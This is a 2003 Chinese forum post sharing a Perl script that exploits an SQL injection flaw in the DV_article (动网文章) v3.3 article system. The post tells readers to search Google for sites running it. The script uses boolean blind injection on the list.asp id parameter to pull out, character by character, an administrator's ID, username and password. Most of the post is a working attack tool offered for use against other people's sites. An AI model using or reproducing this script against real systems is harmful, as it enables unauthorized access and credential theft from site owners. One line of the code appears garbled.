对动网文章系统的过滤不严拿去user 和pass!
[这个贴子最后由豆石在 2003/06/07 08:57am 第 3 次编辑]
漏洞是由pskey 发现
代码来在haowawa.com
本人进行了点小修改。
用google 找下动网文章 ver3.3 之类的 ,就能找到许多用动网文章 做的文章管理系统。
用下面的脚本就可以拿他的 用户和密码
#!/usr/bin/perl
#The script Crack user&pass for DV_article system
#Code by wawa@21cn.com
#Grouppage Http://www.Haowawa.com/
#Homepage Http://wawa.Haowawa.com/
#豆石 修改(一是把错误反馈改为正确反馈,二是把提交的子程序用了另外的代码。)
use IO::Socket;
$ARGC = @ARGV;
if ($ARGC != 4)
{
print "\n\n";
print "\t* The script Crack user&pass for DV_article system *\n";
print "\n\t Welcom to www.Haowawa.com && www.thysea.com\n";
print "\n\tExample: $0 127.0.0.1 /txt/list.asp 53 \"文章的反馈\"\n";
print "\t $0 \n\n\n";
exit;
}
$host = @ARGV[0];
$way = @ARGV[1];
$txtid = @ARGV[2];
$riginfo =@ARGV[3];
$port = 80;
print "\n\t* Welcom to http://www.Haowawa.com && http://wawa.haowawa.com *\n";
print "\n\n开始在 $host 上进行测试,请等待......\n";
#下面是测试一个管理员的id。
for ($adminid=1;$adminid<=100;$adminid++)
{
$way1 = "?id=$txtid%20AND%20$adminid=(select%20min(id)%20from%20admin%20where%20flag=1)";
&url;
#@res = &connect;
@res =sendraw($req);
#print @res;
if ("@res" =~ /$riginfo/)
{
print "\n\t* 发现一管理员ID号为: $adminid \n";
last;
}
}
#
#下面是测试该id的密码长度。
for ($passlen=1;$passlen<=10;$passlen++)
{
$way1 = "?id=$txtid%20AND%20$passlen=(select%20len(password)%20from%20admin%20where%20id=$adminid)";
&url;
@res =sendraw($req);
#print @res;
if ("@res" =~ /$riginfo/)
{
print "\n\t* 发现ID=$adminid的管理员的密码长度为: $passlen 位\n";
last;
}
}
#测试用户名的长度。
for ($userlen=1;$userlen<=20;$userlen++)
{
$way1 = "?id=$txtid%20AND%20$userlen=(select%20len(username)%20from%20admin%20where%20id=$adminid)";
&url;
@res = sendraw($req);
if ("@res" =~ /$riginfo/)
{
print "\n\t* 发现ID=$adminid的管理员的用户名长度为: $userlen 位\n";
last;
}
}
#定义用到的字符。
@dig=(0..9);
@char=(a..z);
@tchar=qw(` ~ ! + @ # $ ^ * \( \) _ = - { } [ ] : " ; < > ? | , . / \\);
@dic=(@dig,@char,@tchar);
@dic1=(@char,@dig,@tchar);
print "\n开始尝试获取ID=$adminid的管理员的用户名及密码,请等待......\n";
for ($userlocat=1;$userlocat<=$userlen;$userlocat++)
{
foreach $usertemp(@dic1)
{
$user=$userdic.$usertemp;
$way1 = "?id=$txtid%20AND%20'$user'=(select%20mid(username,1,$userlocat)%20from%20admin%20where%20id=$adminid)";
#$way1 = "?id=$txtid%20AND%20$adminid=(select%20id%20from%20admin%20where%20left(password,$userlocat)='$user'";
&url;
@res = sendraw($req);
if ("@res" =~ /$riginfo/)
{
if ($userlocat==$userlen){print "\n\n\t* 获取成功!!! ID=$adminid的管理员名字是: $user\n";last;}
print "\n\t* ID=$adminid的管理员名字的前 $userlocat 位为 $user";
$userdic=$userdic.$usertemp;
last;
}
}
}
for ($passlocat=1;$passlocat<=$passlen;$passlocat++)
{
foreach $passtemp(@dic)
{
$pass=$passdic.$passtemp;
$way1 = "?id=$txtid%20AND%20'$pass'=(select%20mid(password,1,$passlocat)%20from%20admin%20where%20id=$adminid)";
&url;
@res = sendraw($req);
if ("@res" =~ /$riginfo/)
{
if ($passlocat==$passlen){print "\n\n\t* 获取成功!!! ID=$adminid的管理员密码是: $pass";last;}
print "\n\t* ID=$adminid的管理员密码的前 $passlocat 位为 $pass";
$passdic=$passdic.$passtemp;
last;
}
}
}
print "\n\n\n\t* 测试完毕. 获取到一个用户名为$user密码为$pass的管理员权限! *\n";
print "\n\n\n";
#thanx rfp's sendraw 下面的子程序是个提交请求,和获得回应的。
sub sendraw {
my ($request) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket
problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $request;
my @res = ;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}
#下面是对输入的请求进行处理。
sub url
{
$req = "GET $way$way1 HTTP/1.0\n".
"Host: $host\n".
"Referer: $host\n".
"Cookie: \n\n";
}
|
